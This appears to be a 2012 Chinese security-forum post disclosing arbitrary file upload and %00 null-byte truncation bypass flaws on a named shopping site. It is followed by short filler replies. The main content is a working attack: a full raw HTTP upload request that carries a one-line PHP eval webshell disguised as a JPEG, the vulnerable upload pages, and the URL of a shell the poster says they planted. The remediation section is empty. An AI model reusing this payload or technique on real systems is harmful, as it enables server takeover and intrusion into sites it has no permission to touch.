快乐购物网任意文件上传&欺骗上传漏洞技巧

admin · 发表于 2012-10-6 07:30:15

某公司任意文件上传,另外的上传页面存在欺骗上传漏洞(%00截断)..
欺骗上传的，不返回路径，通过前面上传的shell去看了下，确实是上传成功了的...
返回上传路径的上传页面
http://zt.happigo.com/sc/d/xiangjijie/post_pic.php#upload_
上传的shell
http://zt.happigo.com/sc/d/xiangjijie/uploads/2012/08/20/dc3fbca363fe2a1aaf08b38e2833f403.php

另外的页面，可以通过%00截断上传，但是不返回上传的路径，但是去路径下面看了下，确实是上传上去的了~
POST /sc/d/gougoukeaixiu/action.php?method=upload HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://zt.happigo.com/sc/d/gougoukeaixiu/index.php?result=success
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7dc31fc170554
Accept-Encoding: gzip, deflate
Host: zt.happigo.com
Content-Length: 1600
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: [cookies]
-----------------------------7dc31fc170554
Content-Disposition: form-data; name="fileField"; filename="3.php"
Content-Type: image/pjpeg
<?php @eval($_REQUEST['ok']);?>
-----------------------------7dc31fc170554
Content-Disposition: form-data; name="title"
OK
-----------------------------7dc31fc170554--
上传上去的shell

另外的

不返回路径的上传页面
http://zt.happigo.com/sc/d/apply100930/upload.html
http://zt.happigo.com/sc/d/gougoukeaixiu/index.php
修复方案：

显示全部楼层 · 发表于 2012-10-6 23:17:38

提示: 作者被禁止或删除内容自动屏蔽

飞阿斯顿爱上 · 发表于 2012-10-10 00:14:51

哈哈，看的人少，回一下

韩妹 · 发表于 2012-10-11 13:57:14

我是来收集资料滴...

我也在看 · 发表于 2014-9-28 02:32:53

初来乍到，请多多关照。。。

我是神你是人 · 发表于 2014-11-17 10:21:09

照你这么说真的有道理哦呵呵不进沙子馁~~~

反恐精英呵呵 · 发表于 2014-12-4 21:22:53

我的啦嘿嘿

一二三三二一 · 发表于 2014-12-27 23:51:17

谢谢楼主啊！

朋友和陪 · 发表于 2015-1-27 21:50:55

呵呵,明白了

为什么 · 发表于 2015-3-1 21:58:30

回帖是种美德.

dkwude 该用户已被删除	发表于 2012-10-6 23:17:38 \| 显示全部楼层提示: 作者被禁止或删除内容自动屏蔽
dkwude 该用户已被删除
	回复支持反对使用道具举报显身卡